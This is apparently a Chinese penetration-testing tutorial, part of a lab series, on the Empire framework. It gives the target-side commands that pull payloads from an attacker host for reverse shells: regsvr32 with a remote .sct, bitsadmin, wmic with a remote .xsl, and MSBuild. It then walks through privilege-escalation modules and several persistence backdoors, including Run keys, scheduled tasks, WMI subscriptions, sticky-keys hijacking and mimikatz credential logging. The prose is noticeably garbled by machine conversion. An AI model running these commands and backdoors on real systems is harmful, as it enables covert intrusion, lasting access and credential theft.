内网渗透 day15-empire提权和后门植入

empire(usestager用法、提权、耐久化后门）

本章条件：已成功设置监听器(如何设置监听器请看day14篇)

1. usestager的几种用法

windows/launcher_sct:

介绍:Regsv(r)32指令用于注册COM组件，是Windows体系供给的用来向体系注册控件或许卸载控件的指令，以指令行方法运转。WinXP及以上体系的regsv(r)32.exe在windows\system32文件夹下；2000体系的regsv(r)32.exe在winnt\system32文件夹下。

用法:regsv(r)32 [/u] [/s] [/n] [/i[:cmdline]] dllname

1) usestager windows/launcher_sct     进入windows/launcher_sct模块

2) 设置一下参数

set Listener kaliset OutFile /var/www/html/xx.sct

3) execute  履行

4) 在靶机上运转 regsv(r)32 /u /n /s /i:http://192.168.227.129/xx.sct scrobj.dll

5) 成功回来会话

windows/launcher_vbs:

长途下载：bitsadmin /transfer /n http://IP/xx.vbs path

1) usestager windows/launcher_vbs     进入windows/launcher_vbs模块

2) 设置一下参数

3) execute  履行

4) 在靶机上运转

bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs

5) 靶机履行.vbs文件，成功反弹会话

windows/launcher_xml:

MSBuild是一个免费的开源构建东西集，用于办理本地C++代码.在Visual Studio2013之前,MSBuild是作为.NET结构的一部分,可是在其之后,MSBuild被绑定到了Visual Studio.所以,Visual Studio依赖于MSBuild，可是MSBuild并不依赖于Visual Studio。

用法:运用net4.0之后的版别中的MSBuild运转注入shellcode的xml文件反弹shell。

1) 跟前面两个操作相同生成xml文件到/var/www/html/文件夹下

2) 在靶机上下载该文件

3) 在靶机上cd到C:\Windows\Microsoft.NET\Framework64\v4.0.30319\运用MSBuild运转xml

4) 成功反弹会话

windows/wmic:

WMIC扩展WMI（Windows Management Instrumentation，Windows办理东西） ，供给了从指令行接口和批指令脚本履行体系办理的支撑。

用法:wmic os get /format:"http://IP/xx.xsl"

1) 跟前面两个的操作过程相同将生成的xsl存到html文件夹下

2) 在靶机上履行wmic os get /format:"http://192.168.227.129/xx.xsl"

3) 成功反弹会话

2. empire提权模块

uac和bypassuac在day14有介绍

本地提权

ms16-135：Win32k 信息泄漏缝隙

若要运用此缝隙，攻击者必须登录到受影响的体系并运转经特别规划的应用程序。此安全更新 程序经过更正 Windows 内核处理内存地址的方法来修复这个缝隙。

searchmodule ms16-135 查找ms16-135模块

usemodule privesc/ms16-135    运用模块

设置完参数后履行

成功反弹具有特权的会话

ms16-032：辅佐登录特权提高缝隙

假如 Windows 辅佐登录服务未能正确办理内存中的请求句柄，Microsoft Windows 中会存在 一个特权提高缝隙。 成功运用此缝隙的攻击者能够以办理员身份运转恣意代码。

usemodule privesc/ms16-032    运用模块

设置完参数履行

成功回来有体系特权的会话

powershell/privesc/sherlock 查找Windows本地特权晋级缝隙

usemodule privesc/sherlock  运用该模块

显现本地特权晋级的缝隙

运用powerup进行提权

PowerUp是一个PowerShell东西，可帮忙Windows体系上的本地特权晋级。它包含多种方法来 辨认和乱用易受攻击的服务，以及DLL绑架机会，易受攻击的注册表设置和晋级机会。它是PowerTools 的一部分，位于https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp。Empire 在privesc / powerup / *模块中完成了PowerUp的晋级功用 。

usemodule privesc/powerup/allchecks 检测是否能够运用powerup缝隙

显现存在缝隙

依据显现存在的缝隙运用对应模块

能够看到存在对服务可履行文件的装备不当权限（可经过service_exe_ *加以运用）

不过这边我都试过了一遍，不是很好用

3. 耐久化后门

PowerBreach

介绍:PowerBreach是一系列内存中的PowerShell后门，可为各种选项供给触发器。

persistence/powerbreach/deaduser–承受用户名和关于用户名是否是域名（相对于本地帐户）的开关/标志。脚本每隔Sleep秒就会检查帐户是否依然存在，假如不存在则触发登台逻辑。该后门不需求本地办理员权限。

了解:判断你设置的用户名是否存在（有没有被改名或许删除），当被改名的时分会就触发该脚本反弹shell

usemodule persistence/powerbreach/deaduser 运用模块

检查所需参数

设置相关参数

履行

把aaa改成了bbb

成功反弹shell

persistence/powerbreach/eventlog- 事情日志–按时刻距离查询安全事情日志，以查找具有唯一触发器值的事情。此后门DOES需求办理员权限才干拜访安全事情日志。

usemodule persistence/powerbreach/eventlog* 运用模块

检查所需参数

设置相关参数

履行

打开靶机的eventvwr，当安全日志中存在HACKER(上面参数界说的能够自己更改)关键字时

成功反弹会话

由于是办理员权限留下的后门，所以回来的会话也具有办理员权限

persistence/powerbreach /resolver–需求解析的主机名和触发IP。脚本每隔睡眠秒数检查一次主机名是否解析为触发IP，否则将触发暂存逻辑。该后门不需求本地办理员权限。

usemodule persistence/powerbreach/resolver 运用模块

检查所需参数

设置相关参数

履行

靶机上去拜访一下127.0.0.1，让他进行解析

成功反弹shell

Userland

persistence/userland/ *模块允许用户态，从重启的耐久性（即无需办理权限）。假如指定了侦听器，则会主动生成Empire署理的登台代码并将其用作触发的脚本逻辑。

persistence/userland /registry –在HKCU:Software\Microsoft\Windows\CurrentVersion\Run中设置一个值，以在挑选的任何存储机制下履行脚本。仅当该用户登录时，这将导致脚本运转。

usemodule persistence/userland/registry 运用模块

检查所需参数

设置相关参数

履行

将靶机刊出从头登录，成功回来shell会话（这里用户登录的时分会有短暂的powershell弹框）

persistence/userland/schtask–装备方案的使命以在挑选任何存储机制的情况下履行脚本。该脚本能够在DailyTime（HH：mm格局）下触发，或许在用户搁置IdleTime秒后触发

了解:这个是放注册表中的方案使命

usemodule persistence/userland/schtasks 运用模块

检查所需参数

设置相关参数

履行

将靶机刊出从头登录，等设置的时刻到，成功回来shell会话

Elevated

persistence/elevated/*模块允许重启的耐久性从升高的上下文（即具有办理特权）。假如指定了侦听器，则会主动生成Empire署理的登台代码并将其用作触发的脚本逻辑。

了解:该模块是具有办理员权限留下的具有权限的后门

persistence/elevated/registry、persistence/elevated/schtask，这两个用法和之前的相同，只不过需求办理员权限

persistence/elevated/wmi–装备永久WMI订阅以激起存储的脚本逻辑。该脚本能够在DailyTime（HH：mm格局）或运用AtStartup启动体系时触发。这具有难以检测/去除的等级。

了解:这个是放注册表中的方案使命

usemodule persistence/elevated/wmi* 运用模块

检查所需参数

设置相关参数

履行

将靶机上验证wmi，在powershell中直接输入Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter “Name=’Updater’”

重启靶机，成功反弹有办理员权限的shell

misc

persistence/misc/debugger*-在empire3.6.0版别中把persistence / debugger / * 模块整合到了persistence/misc/debugger*模块中。您能够为RDP提示符下登录前可拜访的各种可履行文件设置“映像文件履行选项”（又叫调试器）。默认情况下，调试器设置为cmd.exe，它使您能够触发经过RDP以SYSTEM身份运转的指令提示符，而无需实际登录计算机。您还能够运用Binary参数指定另一个二进制文件的路径。假如要调试器触发暂存器，请设置Listener参数。这将为指定的侦听器生成一个适宜的暂存器，并将其存储到指定的RegPath中。然后，您能够从RDP提示预身份验证中触发这些登台程序，可是请注意，一旦关闭RDP提示（在不活动30秒后产生），登台的署理将被杀死。

usemodule persistence/misc/debugger* 运用模块

检查所需参数

设置参数

履行

在靶机win7登录界面按5次shift，有个powershell的框一闪而过

成功回来会话，并且是办理员权限

persistence/misc/memssp–安装Mimikatz的memssp模块，该模块应将一切身份验证事情刊出到C：\ Windows \ System32 \ mimisla.log。应该从头引导耐久。

usemodule persistence/misc/memssp* 运用模块

直接运转就能够了

靶机对应目录生成了mimisla.log文件

persistence/misc/disable_machine_acct_change–制止目标更改其计算机帐户暗码。假如首要运转mimikatz/credentials/logonpasswords来转储计算机帐户暗码（帐户以$结束），则您应该具有对给定体系的耐久拜访权限。整理选项也可用。

运用该模块后直接运转就能够了